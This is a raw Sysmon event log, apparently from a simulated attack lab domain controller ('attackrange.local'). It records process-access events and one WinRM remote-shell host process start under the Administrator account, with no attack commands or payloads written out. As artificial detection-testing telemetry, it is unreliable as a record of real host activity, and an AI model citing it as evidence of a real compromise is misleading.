12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000886Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000885Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000884Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000883Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+5d917|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000882Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}81196C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.670{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-62D4-6064-0700-00000000AD01}700C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.655{266CAFBE-6444-6064-EB02-00000000AD01}44364852C:\Windows\system32\conhost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EB02-00000000AD01}4436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.655{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.639{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.653{266CAFBE-6444-6064-EA02-00000000AD01}3812C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe 
-EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-6444-6064-36DE-120000000000}0x12de360HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-62DD-6064-0C00-00000000AD01}8C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:04.639{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 